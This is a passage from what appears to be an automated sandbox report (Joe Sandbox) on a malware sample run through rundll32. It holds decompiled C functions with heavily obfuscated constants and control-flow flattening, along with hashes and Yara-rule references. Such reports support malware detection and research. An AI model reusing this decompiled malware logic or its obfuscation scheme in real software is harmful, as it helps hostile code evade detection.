				intOrPtr _t197;
				intOrPtr _t198;
				intOrPtr _t204;
				intOrPtr _t205;
				signed int _t223;
				signed int _t224;
				signed int _t225;
				intOrPtr _t226;
				void* _t228;
				signed int _t229;
				intOrPtr _t230;
				signed int* _t231;

				_t198 = __ecx;
				_t231 =  &_v92;
				_v8 = __edx;
				_v24 = __ecx;
				_v28 = 0x24c7b9;
				_v28 = _v28 << 9;
				_v28 = _v28 ^ 0x498f7200;
				_v76 = 0x5897f7;
				_v76 = _v76 + 0xffffedf4;
				_v76 = _v76 << 0xf;
				_v76 = _v76 + 0x73e5;
				_v76 = _v76 ^ 0x42f7f56f;
				_v52 = 0x46ab19;
				_v52 = _v52 << 0xd;
				_t228 = 0xe611c04;
				_v20 = _v20 & 0x00000000;
				_t223 = 0x66;
				_v52 = _v52 / _t223;
				_v52 = _v52 ^ 0x0211beab;
				_v80 = 0x97c948;
				_v80 = _v80 ^ 0xfb972484;
				_v80 = _v80 << 2;
				_v80 = _v80 << 0xf;
				_v80 = _v80 ^ 0xdb950905;
				_v44 = 0x96980f;
				_v44 = _v44 ^ 0xfeb8bb56;
				_v44 = _v44 ^ 0xfe2f3013;
				_v64 = 0x454cfa;
				_v64 = _v64 ^ 0x45fe36ac;
				_t224 = 0x43;
				_v64 = _v64 / _t224;
				_v64 = _v64 ^ 0x010b84d0;
				_v68 = 0xb73a82;
				_v68 = _v68 | 0xd419dac3;
				_t225 = 0x23;
				_v68 = _v68 / _t225;
				_v68 = _v68 ^ 0x061f1f3c;
				_v60 = 0xe80863;
				_v60 = _v60 * 7;
				_v60 = _v60 ^ 0x88fb80a0;
				_v60 = _v60 ^ 0x8ea007f2;
				_v40 = 0x80f530;
				_v40 = _v40 ^ 0xcef24483;
				_v40 = _v40 ^ 0xce7935e2;
				_v92 = 0x233377;
				_v92 = _v92 ^ 0x61e14959;
				_v92 = _v92 + 0xffffa5e4;
				_v92 = _v92 + 0xf94b;
				_v92 = _v92 ^ 0x61c7ad44;
				_v88 = 0xbad9cc;
				_v88 = _v88 | 0x5a2a09a8;
				_v88 = _v88 * 0x2f;
				_v88 = _v88 | 0xecc1c683;
				_v88 = _v88 ^ 0xecc3849f;
				_v56 = 0xb0d301;
				_v56 = _v56 + 0xa0bb;
				_v56 = _v56 << 0xf;
				_v56 = _v56 ^ 0xb9db0742;
				_v36 = 0xab48cf;
				_v36 = _v36 * 0x24;
				_v36 = _v36 ^ 0x1811952a;
				_v84 = 0x104632;
				_v84 = _v84 + 0x4a21;
				_v84 = _v84 ^ 0x8dbd106a;
				_v84 = _v84 + 0xfe54;
				_v84 = _v84 ^ 0x8daed025;
				_t226 = _v4;
				_t197 = _v8;
				_t230 = _v8;
				_v72 = 0x1611ea;
				_v72 = _v72 ^ 0xe055e86d;
				_v72 = _v72 >> 0xd;
				_v72 = _v72 >> 5;
				_v72 = _v72 ^ 0x0003993e;
				_v32 = 0x799484;
				_v32 = _v32 ^ 0xb4488d59;
				_v32 = _v32 ^ 0xb439947f;
				L1:
				while(1) {
					do {
						while(_t228 != 0x5161e0c) {
							if(_t228 == 0xb95f952) {
								_t229 = E0034C032( &_v16, _t198, _t184, _t230, _v44, _v64, _v68);
								_t231 =  &(_t231[5]);
								_v20 = _t229;
								if(_t229 == 0) {
									L18:
									E00348519(_v72, _v32, _t197);
								} else {
									_t204 = _v16;
									if(_t204 == 0) {
										L17:
										if(_t229 != 0) {
											_t189 = _v8;
											 *_t189 = _t197;
											 *((intOrPtr*)(_t189 + 4)) = _t226 - _t230;
										} else {
											goto L18;
										}
									} else {
										_v48 = _v48 + _t204;
										_t230 = _t230 - _t204;
										if(_t230 != 0) {
											L10:
											_t184 = _v48;
											L11:
											_t198 = _v24;
											_t228 = 0xb95f952;
											continue;
										} else {
											_t205 = _t226 + _t226;
											_push(_t205);
											_push(_t205);
											_v12 = _t205;
											_t193 = E00337FF2(_t205);
											_v48 = _t193;
											if(_t193 == 0) {
												goto L17;
											} else {
												E0033ED7E(_v88, _t193, _v56, _t197, _t226);
												E00348519(_v36, _v84, _t197);
												_t197 = _v48;
												_t230 = _t226;
												_t231 =  &(_t231[4]);
												_t196 = _t197 + _t226;
												_t226 = _v12;
												_v48 = _t196;
												if(_t230 == 0) {
													goto L17;
												} else {
													goto L10;
												}
											}
										}
									}
								}
							} else {
								if(_t228 != 0xe611c04) {
									goto L15;
								} else {
									_t228 = 0x5161e0c;
									continue;
								}
							}
							L20:
							return _t229;
						}
						_t226 = 0x10000;
						_push(_t198);
						_push(_t198);
						_t184 = E00337FF2(0x10000);
						_t197 = _t184;
						if(_t197 == 0) {
							_t198 = _v24;
							_t228 = 0xa3056fc;
							goto L15;
						} else {
							_v48 = _t184;
							_t230 = 0x10000;
							goto L11;
						}
						goto L20;
						L15:
						_t184 = _v48;
					} while (_t228 != 0xa3056fc);
					_t229 = _v20;
					goto L17;
				}
			}










































                                                                                                                    0x0034a2e8
                                                                                                                    0x0034a2e8
                                                                                                                    0x0034a2ef
                                                                                                                    0x0034a2f3
                                                                                                                    0x0034a2f7
                                                                                                                    0x0034a2ff
                                                                                                                    0x0034a304
                                                                                                                    0x0034a30c
                                                                                                                    0x0034a314
                                                                                                                    0x0034a31c
                                                                                                                    0x0034a321
                                                                                                                    0x0034a329
                                                                                                                    0x0034a331
                                                                                                                    0x0034a339
                                                                                                                    0x0034a342
                                                                                                                    0x0034a34b
                                                                                                                    0x0034a350
                                                                                                                    0x0034a355
                                                                                                                    0x0034a35b
                                                                                                                    0x0034a363
                                                                                                                    0x0034a36b
                                                                                                                    0x0034a373
                                                                                                                    0x0034a378
                                                                                                                    0x0034a37d
                                                                                                                    0x0034a385
                                                                                                                    0x0034a38d
                                                                                                                    0x0034a395
                                                                                                                    0x0034a39d
                                                                                                                    0x0034a3a5
                                                                                                                    0x0034a3b1
                                                                                                                    0x0034a3b6
                                                                                                                    0x0034a3bc
                                                                                                                    0x0034a3c4
                                                                                                                    0x0034a3cc
                                                                                                                    0x0034a3d8
                                                                                                                    0x0034a3db
                                                                                                                    0x0034a3df
                                                                                                                    0x0034a3e7
                                                                                                                    0x0034a3f4
                                                                                                                    0x0034a3f8
                                                                                                                    0x0034a400
                                                                                                                    0x0034a408
                                                                                                                    0x0034a410
                                                                                                                    0x0034a418
                                                                                                                    0x0034a420
                                                                                                                    0x0034a428
                                                                                                                    0x0034a430
                                                                                                                    0x0034a438
                                                                                                                    0x0034a440
                                                                                                                    0x0034a448
                                                                                                                    0x0034a450
                                                                                                                    0x0034a45d
                                                                                                                    0x0034a461
                                                                                                                    0x0034a469
                                                                                                                    0x0034a471
                                                                                                                    0x0034a479
                                                                                                                    0x0034a481
                                                                                                                    0x0034a486
                                                                                                                    0x0034a48e
                                                                                                                    0x0034a49b
                                                                                                                    0x0034a49f
                                                                                                                    0x0034a4a7
                                                                                                                    0x0034a4af
                                                                                                                    0x0034a4b7
                                                                                                                    0x0034a4bf
                                                                                                                    0x0034a4c7
                                                                                                                    0x0034a4cf
                                                                                                                    0x0034a4d3
                                                                                                                    0x0034a4d7
                                                                                                                    0x0034a4df
                                                                                                                    0x0034a4e7
                                                                                                                    0x0034a4ef
                                                                                                                    0x0034a4f4
                                                                                                                    0x0034a4f9
                                                                                                                    0x0034a501
                                                                                                                    0x0034a509
                                                                                                                    0x0034a511
                                                                                                                    0x00000000
                                                                                                                    0x0034a519
                                                                                                                    0x0034a519
                                                                                                                    0x0034a519
                                                                                                                    0x0034a52b
                                                                                                                    0x0034a559
                                                                                                                    0x0034a55b
                                                                                                                    0x0034a55e
                                                                                                                    0x0034a564
                                                                                                                    0x0034a63c
                                                                                                                    0x0034a645
                                                                                                                    0x0034a56a
                                                                                                                    0x0034a56a
                                                                                                                    0x0034a570
                                                                                                                    0x0034a638
                                                                                                                    0x0034a63a
                                                                                                                    0x0034a651
                                                                                                                    0x0034a657
                                                                                                                    0x0034a659
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0034a576
                                                                                                                    0x0034a576
                                                                                                                    0x0034a57a
                                                                                                                    0x0034a57c
                                                                                                                    0x0034a5df
                                                                                                                    0x0034a5df
                                                                                                                    0x0034a5e3
                                                                                                                    0x0034a5e3
                                                                                                                    0x0034a5e7
                                                                                                                    0x00000000
                                                                                                                    0x0034a57e
                                                                                                                    0x0034a582
                                                                                                                    0x0034a58f
                                                                                                                    0x0034a590
                                                                                                                    0x0034a591
                                                                                                                    0x0034a595
                                                                                                                    0x0034a59a
                                                                                                                    0x0034a5a2
                                                                                                                    0x00000000
                                                                                                                    0x0034a5a8
                                                                                                                    0x0034a5b4
                                                                                                                    0x0034a5c2
                                                                                                                    0x0034a5c7
                                                                                                                    0x0034a5cb
                                                                                                                    0x0034a5cd
                                                                                                                    0x0034a5d0
                                                                                                                    0x0034a5d3
                                                                                                                    0x0034a5d7
                                                                                                                    0x0034a5dd
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0034a5dd
                                                                                                                    0x0034a5a2
                                                                                                                    0x0034a57c
                                                                                                                    0x0034a570
                                                                                                                    0x0034a52d
                                                                                                                    0x0034a533
                                                                                                                    0x00000000
                                                                                                                    0x0034a539
                                                                                                                    0x0034a539
                                                                                                                    0x00000000
                                                                                                                    0x0034a539
                                                                                                                    0x0034a533
                                                                                                                    0x0034a65d
                                                                                                                    0x0034a665
                                                                                                                    0x0034a665
                                                                                                                    0x0034a5f5
                                                                                                                    0x0034a604
                                                                                                                    0x0034a605
                                                                                                                    0x0034a606
                                                                                                                    0x0034a60b
                                                                                                                    0x0034a611
                                                                                                                    0x0034a61b
                                                                                                                    0x0034a61f
                                                                                                                    0x00000000
                                                                                                                    0x0034a613
                                                                                                                    0x0034a613
                                                                                                                    0x0034a617
                                                                                                                    0x00000000
                                                                                                                    0x0034a617
                                                                                                                    0x00000000
                                                                                                                    0x0034a624
                                                                                                                    0x0034a624
                                                                                                                    0x0034a628
                                                                                                                    0x0034a634
                                                                                                                    0x00000000
                                                                                                                    0x0034a634

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: !J$YIa$mU$s
                                                                                                                    • API String ID: 0-3335770892
                                                                                                                    • Opcode ID: a2c96b5523714fc353019ef791256b388c8b4530006014acc88a687be62f7107
                                                                                                                    • Instruction ID: b8541b07737bcd142913ab2132fea5eced50eba53a9643523598cbaf6a79f19e
                                                                                                                    • Opcode Fuzzy Hash: a2c96b5523714fc353019ef791256b388c8b4530006014acc88a687be62f7107
                                                                                                                    • Instruction Fuzzy Hash: 549140B19093409BC355CF29C18580BFBF1BBC5758F548A1EF9959B260D3B8EA09CB83
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00334EE3 Relevance: 5.2, Strings: 4, Instructions: 168COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 96%
                                                                                                                    			E00334EE3(intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				char _v608;
				void* _t203;
				void* _t204;
				void* _t207;
				signed int _t212;
				signed int _t213;
				signed int _t214;
				signed int _t215;
				intOrPtr _t216;
				void* _t221;

				_v84 = _v84 & 0x00000000;
				_v88 = 0xf9097a;
				_v32 = 0xbcbe1d;
				_v32 = _v32 << 9;
				_v32 = _v32 << 9;
				_v32 = _v32 << 0xb;
				_v32 = _v32 ^ 0xa0062323;
				_v16 = 0x782140;
				_v16 = _v16 + 0xfffffe34;
				_v16 = _v16 + 0xfffffe18;
				_v16 = _v16 << 0xa;
				_v16 = _v16 ^ 0xe0701d9a;
				_v40 = 0x7af846;
				_v40 = _v40 + 0xffff28b3;
				_v40 = _v40 << 0xd;
				_v40 = _v40 + 0xffffd351;
				_v40 = _v40 ^ 0x441384bc;
				_v68 = 0xebfd4;
				_v68 = _v68 + 0xffff2b98;
				_t212 = 0x4b;
				_v68 = _v68 / _t212;
				_v68 = _v68 ^ 0x000f3184;
				_v48 = 0x77c678;
				_t213 = 0x72;
				_v48 = _v48 * 0x4d;
				_v48 = _v48 + 0x6b8c;
				_v48 = _v48 ^ 0x240efbe4;
				_v24 = 0xae1064;
				_v24 = _v24 / _t213;
				_v24 = _v24 << 7;
				_v24 = _v24 ^ 0x1be7fa9d;
				_v24 = _v24 ^ 0x1b226397;
				_v72 = 0x44bde7;
				_v72 = _v72 | 0x5f63ee23;
				_v72 = _v72 ^ 0x5f6de837;
				_v56 = 0x5a94a4;
				_v56 = _v56 >> 9;
				_t214 = 0xc;
				_v56 = _v56 * 0x2a;
				_v56 = _v56 ^ 0x0003dc1b;
				_v8 = 0x2a4d30;
				_v8 = _v8 + 0xff2b;
				_v8 = _v8 | 0x9a82811b;
				_v8 = _v8 << 0xc;
				_v8 = _v8 ^ 0xbcdbc31f;
				_v64 = 0xa41a91;
				_v64 = _v64 | 0x62aa1889;
				_v64 = _v64 << 0xd;
				_v64 = _v64 ^ 0xc357e7aa;
				_v36 = 0x90fe9;
				_v36 = _v36 >> 0xa;
				_v36 = _v36 | 0x57d87c49;
				_v36 = _v36 / _t214;
				_v36 = _v36 ^ 0x0755636a;
				_v28 = 0x5fda7e;
				_v28 = _v28 + 0xffff2d0f;
				_v28 = _v28 << 0xa;
				_v28 = _v28 + 0xdffb;
				_v28 = _v28 ^ 0x7c1a8a5e;
				_v20 = 0xaf632f;
				_v20 = _v20 >> 8;
				_v20 = _v20 << 9;
				_v20 = _v20 >> 0xf;
				_v20 = _v20 ^ 0x0003fa93;
				_v12 = 0x960758;
				_v12 = _v12 ^ 0x64ee01f0;
				_v12 = _v12 | 0x3d3dd2ba;
				_v12 = _v12 << 7;
				_v12 = _v12 ^ 0xbeed48c5;
				_v80 = 0xba0fdf;
				_v80 = _v80 + 0xfd2d;
				_v80 = _v80 ^ 0x00b93168;
				_v60 = 0x5f834c;
				_v60 = _v60 ^ 0x963b7b6a;
				_t215 = 0x3f;
				_v60 = _v60 * 0x3e;
				_v60 = _v60 ^ 0x6c73d449;
				_v76 = 0x4b89c6;
				_v76 = _v76 >> 6;
				_v76 = _v76 ^ 0x0008f57a;
				_v52 = 0x3d488e;
				_v52 = _v52 << 6;
				_v52 = _v52 << 8;
				_v52 = _v52 ^ 0x5226582a;
				_v44 = 0x8cf369;
				_v44 = _v44 ^ 0x25329c0c;
				_v44 = _v44 / _t215;
				_v44 = _v44 >> 0xe;
				_v44 = _v44 ^ 0x0005c7da;
				_t216 =  *0x353e10; // 0x0
				_t203 = E0033B6CF(_t216 + 0x1c, _v32, _v16, _v40);
				_t241 = _a4 + 0x2c;
				_t204 = E0033B23C(_v68, _v48, _a4 + 0x2c, _v24, _v72, _t203);
				_t248 = _t204;
				if(_t204 != 0) {
					_push(_v64);
					_push(_v8);
					_t207 = E0034DCF7(_v56, 0x331000, _t248);
					_pop(_t221);
					E003347CE( *((intOrPtr*)(_a8 + 0x18)), _v36, _t221, _v28, _v20, _t207, _t241, _v12, _v80);
					E0033A8B0(_v60, _t207, _v76);
					E00341F8A(_v52, _v44,  &_v608);
				}
				return 1;
			}


































                                                                                                                    0x00334eec
                                                                                                                    0x00334ef2
                                                                                                                    0x00334ef9
                                                                                                                    0x00334f00
                                                                                                                    0x00334f04
                                                                                                                    0x00334f08
                                                                                                                    0x00334f0c
                                                                                                                    0x00334f13
                                                                                                                    0x00334f1a
                                                                                                                    0x00334f21
                                                                                                                    0x00334f28
                                                                                                                    0x00334f2c
                                                                                                                    0x00334f33
                                                                                                                    0x00334f3a
                                                                                                                    0x00334f41
                                                                                                                    0x00334f45
                                                                                                                    0x00334f4c
                                                                                                                    0x00334f53
                                                                                                                    0x00334f5a
                                                                                                                    0x00334f67
                                                                                                                    0x00334f6c
                                                                                                                    0x00334f71
                                                                                                                    0x00334f78
                                                                                                                    0x00334f83
                                                                                                                    0x00334f86
                                                                                                                    0x00334f89
                                                                                                                    0x00334f90
                                                                                                                    0x00334f97
                                                                                                                    0x00334fa5
                                                                                                                    0x00334fa8
                                                                                                                    0x00334fac
                                                                                                                    0x00334fb3
                                                                                                                    0x00334fba
                                                                                                                    0x00334fc1
                                                                                                                    0x00334fc8
                                                                                                                    0x00334fcf
                                                                                                                    0x00334fd6
                                                                                                                    0x00334fde
                                                                                                                    0x00334fdf
                                                                                                                    0x00334fe2
                                                                                                                    0x00334fe9
                                                                                                                    0x00334ff0
                                                                                                                    0x00334ff7
                                                                                                                    0x00334ffe
                                                                                                                    0x00335002
                                                                                                                    0x00335009
                                                                                                                    0x00335010
                                                                                                                    0x00335017
                                                                                                                    0x0033501b
                                                                                                                    0x00335022
                                                                                                                    0x00335029
                                                                                                                    0x0033502d
                                                                                                                    0x00335039
                                                                                                                    0x0033503c
                                                                                                                    0x00335043
                                                                                                                    0x0033504a
                                                                                                                    0x00335051
                                                                                                                    0x00335055
                                                                                                                    0x0033505c
                                                                                                                    0x00335063
                                                                                                                    0x0033506a
                                                                                                                    0x0033506e
                                                                                                                    0x00335072
                                                                                                                    0x00335076
                                                                                                                    0x0033507d
                                                                                                                    0x00335084
                                                                                                                    0x0033508b
                                                                                                                    0x00335094
                                                                                                                    0x00335098
                                                                                                                    0x0033509f
                                                                                                                    0x003350a6
                                                                                                                    0x003350ad
                                                                                                                    0x003350b4
                                                                                                                    0x003350bb
                                                                                                                    0x003350c8
                                                                                                                    0x003350c9
                                                                                                                    0x003350cc
                                                                                                                    0x003350d3
                                                                                                                    0x003350da
                                                                                                                    0x003350de
                                                                                                                    0x003350e5
                                                                                                                    0x003350ec
                                                                                                                    0x003350f0
                                                                                                                    0x003350f4
                                                                                                                    0x003350fb
                                                                                                                    0x00335102
                                                                                                                    0x0033510e
                                                                                                                    0x00335111
                                                                                                                    0x00335115
                                                                                                                    0x00335122
                                                                                                                    0x0033512e
                                                                                                                    0x0033513a
                                                                                                                    0x00335147
                                                                                                                    0x0033514f
                                                                                                                    0x00335151
                                                                                                                    0x00335154
                                                                                                                    0x0033515c
                                                                                                                    0x00335162
                                                                                                                    0x0033516d
                                                                                                                    0x00335189
                                                                                                                    0x00335196
                                                                                                                    0x003351a8
                                                                                                                    0x003351b0
                                                                                                                    0x003351b8

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: lstrcmpi
                                                                                                                    • String ID: *X&R$0M*$7m_$@!x
                                                                                                                    • API String ID: 1586166983-4050865940
                                                                                                                    • Opcode ID: cf76ed883e2c517cea4e06fbbad761ca52339e0a87214bfdeeab675a706427df
                                                                                                                    • Instruction ID: b647e2f311eab43e4243e87d0b142f4af5856e780e806739e93239b3ca75e2f8
                                                                                                                    • Opcode Fuzzy Hash: cf76ed883e2c517cea4e06fbbad761ca52339e0a87214bfdeeab675a706427df
                                                                                                                    • Instruction Fuzzy Hash: 1D81F272C0121DABCF49DFA1D88A8EEFBB1FB54718F208118E511B6260D7B55A4ACF54
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0033EA99 Relevance: 5.2, Strings: 4, Instructions: 153COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 92%
                                                                                                                    			E0033EA99(void* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				void* _t136;
				signed int _t147;
				void* _t150;
				intOrPtr* _t152;
				void* _t154;
				void* _t165;
				signed int _t166;
				signed int _t167;
				signed int* _t171;

				_push(_a16);
				_t152 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E003420B9(_t136);
				_v52 = 0x4b44d9;
				_t171 =  &(( &_v68)[6]);
				_t165 = 0;
				_t154 = 0x40ad1f2;
				_t166 = 0x41;
				_v52 = _v52 * 0x5c;
				_v52 = _v52 ^ 0xd486af61;
				_v52 = _v52 ^ 0xcf8a129f;
				_v24 = 0x8b17cc;
				_v24 = _v24 + 0xffff02b5;
				_v24 = _v24 ^ 0x008a1a91;
				_v64 = 0xcc4e1;
				_v64 = _v64 ^ 0x71537a57;
				_v64 = _v64 | 0xbc84d226;
				_v64 = _v64 + 0x8a58;
				_v64 = _v64 ^ 0xbde0890e;
				_v12 = 0x10173e;
				_v12 = _v12 / _t166;
				_v12 = _v12 ^ 0x000bb2e7;
				_v16 = 0xcbf18d;
				_v16 = _v16 + 0x7f8c;
				_v16 = _v16 ^ 0x00cd0dea;
				_v20 = 0x7a67ce;
				_v20 = _v20 << 1;
				_v20 = _v20 ^ 0x00fa626e;
				_v68 = 0x7779f8;
				_v68 = _v68 + 0xa85e;
				_v68 = _v68 << 0x10;
				_v68 = _v68 >> 3;
				_v68 = _v68 ^ 0x0443aeb4;
				_v28 = 0xee6391;
				_v28 = _v28 ^ 0x2bfa2339;
				_v28 = _v28 ^ 0x2b1bacd2;
				_v32 = 0x87b642;
				_v32 = _v32 + 0xffff3baa;
				_v32 = _v32 ^ 0x008fda80;
				_v36 = 0x3b697f;
				_v36 = _v36 | 0x5675f49c;
				_v36 = _v36 ^ 0x5679bffa;
				_v40 = 0x254a84;
				_v40 = _v40 * 0x67;
				_v40 = _v40 ^ 0x0f0bd396;
				_v44 = 0xfc206d;
				_v44 = _v44 * 0x45;
				_v44 = _v44 ^ 0x43f6aa11;
				_v56 = 0x3dd941;
				_v56 = _v56 ^ 0x94d2d45c;
				_v56 = _v56 >> 9;
				_v56 = _v56 ^ 0x00419011;
				_v4 = 0xdcf5c3;
				_v4 = _v4 ^ 0x0d464ae6;
				_v4 = _v4 ^ 0x0d938ce3;
				_v60 = 0xe23f0;
				_v60 = _v60 ^ 0x0435e191;
				_v60 = _v60 ^ 0xbde67646;
				_v60 = _v60 ^ 0xb922f804;
				_v60 = _v60 ^ 0x00f2260b;
				_v8 = 0x523a90;
				_v8 = _v8 * 0x75;
				_v8 = _v8 ^ 0x259e6962;
				_v48 = 0x46565e;
				_t167 = 3;
				_v48 = _v48 * 0x6a;
				_t168 = _v4;
				_v48 = _v48 / _t167;
				_v48 = _v48 ^ 0x09b4f31e;
				do {
					while(_t154 != 0x40ad1f2) {
						if(_t154 == 0x458d12f) {
							_t147 = E00338F65(_v12, _v16, _a12, _v20, _v24, _t154, _v64, _v68, _v52, _v28, _t154, 0);
							_t168 = _t147;
							_t171 =  &(_t171[0xa]);
							if(_t147 != 0xffffffff) {
								_t154 = 0x4af2a99;
								continue;
							}
						} else {
							if(_t154 == 0x4af2a99) {
								_t150 = E003319B8(_t154, _v36,  *((intOrPtr*)(_t152 + 4)), _v40, _t168, _v44, _v56, _t152 + 4,  *_t152);
								_t171 =  &(_t171[8]);
								_t165 = _t150;
								_t154 = 0xe5b5021;
								continue;
							} else {
								if(_t154 != 0xe5b5021) {
									goto L11;
								} else {
									E00341E67(_v4, _v60, _v8, _v48, _t168);
								}
							}
						}
						L6:
						return _t165;
					}
					_t154 = 0x458d12f;
					L11:
				} while (_t154 != 0xd2f352d);
				goto L6;
			}





























                                                                                                                    0x0033eaa0
                                                                                                                    0x0033eaa4
                                                                                                                    0x0033eaa6
                                                                                                                    0x0033eaaa
                                                                                                                    0x0033eaae
                                                                                                                    0x0033eab2
                                                                                                                    0x0033eab3
                                                                                                                    0x0033eab4
                                                                                                                    0x0033eab9
                                                                                                                    0x0033eac1
                                                                                                                    0x0033eacb
                                                                                                                    0x0033eacd
                                                                                                                    0x0033ead4
                                                                                                                    0x0033ead5
                                                                                                                    0x0033ead9
                                                                                                                    0x0033eae1
                                                                                                                    0x0033eae9
                                                                                                                    0x0033eaf1
                                                                                                                    0x0033eaf9
                                                                                                                    0x0033eb01
                                                                                                                    0x0033eb09
                                                                                                                    0x0033eb11
                                                                                                                    0x0033eb19
                                                                                                                    0x0033eb21
                                                                                                                    0x0033eb29
                                                                                                                    0x0033eb37
                                                                                                                    0x0033eb3b
                                                                                                                    0x0033eb43
                                                                                                                    0x0033eb4b
                                                                                                                    0x0033eb53
                                                                                                                    0x0033eb5b
                                                                                                                    0x0033eb63
                                                                                                                    0x0033eb67
                                                                                                                    0x0033eb6f
                                                                                                                    0x0033eb77
                                                                                                                    0x0033eb7f
                                                                                                                    0x0033eb84
                                                                                                                    0x0033eb89
                                                                                                                    0x0033eb91
                                                                                                                    0x0033eb99
                                                                                                                    0x0033eba1
                                                                                                                    0x0033eba9
                                                                                                                    0x0033ebb1
                                                                                                                    0x0033ebb9
                                                                                                                    0x0033ebc1
                                                                                                                    0x0033ebc9
                                                                                                                    0x0033ebd1
                                                                                                                    0x0033ebd9
                                                                                                                    0x0033ebe6
                                                                                                                    0x0033ebea
                                                                                                                    0x0033ebf2
                                                                                                                    0x0033ebff
                                                                                                                    0x0033ec03
                                                                                                                    0x0033ec0b
                                                                                                                    0x0033ec13
                                                                                                                    0x0033ec1b
                                                                                                                    0x0033ec20
                                                                                                                    0x0033ec28
                                                                                                                    0x0033ec30
                                                                                                                    0x0033ec38
                                                                                                                    0x0033ec40
                                                                                                                    0x0033ec48
                                                                                                                    0x0033ec50
                                                                                                                    0x0033ec58
                                                                                                                    0x0033ec60
                                                                                                                    0x0033ec68
                                                                                                                    0x0033ec75
                                                                                                                    0x0033ec79
                                                                                                                    0x0033ec81
                                                                                                                    0x0033ec92
                                                                                                                    0x0033ec98
                                                                                                                    0x0033eca2
                                                                                                                    0x0033eca6
                                                                                                                    0x0033ecaa
                                                                                                                    0x0033ecb2
                                                                                                                    0x0033ecb2
                                                                                                                    0x0033ecc0
                                                                                                                    0x0033ed52
                                                                                                                    0x0033ed57
                                                                                                                    0x0033ed59
                                                                                                                    0x0033ed5f
                                                                                                                    0x0033ed61
                                                                                                                    0x00000000
                                                                                                                    0x0033ed61
                                                                                                                    0x0033ecc2
                                                                                                                    0x0033ecc8
                                                                                                                    0x0033ed16
                                                                                                                    0x0033ed1b
                                                                                                                    0x0033ed1e
                                                                                                                    0x0033ed20
                                                                                                                    0x00000000
                                                                                                                    0x0033ecca
                                                                                                                    0x0033ecd0
                                                                                                                    0x00000000
                                                                                                                    0x0033ecd6
                                                                                                                    0x0033ece7
                                                                                                                    0x0033ecec
                                                                                                                    0x0033ecd0
                                                                                                                    0x0033ecc8
                                                                                                                    0x0033ecef
                                                                                                                    0x0033ecf8
                                                                                                                    0x0033ecf8
                                                                                                                    0x0033ed6b
                                                                                                                    0x0033ed6d
                                                                                                                    0x0033ed6d
                                                                                                                    0x00000000

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: -5/$WzSq$^VF$JF
                                                                                                                    • API String ID: 0-2399144359
                                                                                                                    • Opcode ID: 1a99258aef2ebd0cedbce0666f862dafcadd34ac8b3dd1b99f29c3393997e72b
                                                                                                                    • Instruction ID: adf0cee9ffc205c19b44d1f8601b04c7bc0745c45448eca7535d7801cb75c2c5
                                                                                                                    • Opcode Fuzzy Hash: 1a99258aef2ebd0cedbce0666f862dafcadd34ac8b3dd1b99f29c3393997e72b
                                                                                                                    • Instruction Fuzzy Hash: BD7131710083419FC759CF65C98681BBBF2FBC8758F505A1DF296A6260C3B1DA488F83
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00349BCF Relevance: 5.1, Strings: 4, Instructions: 133COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
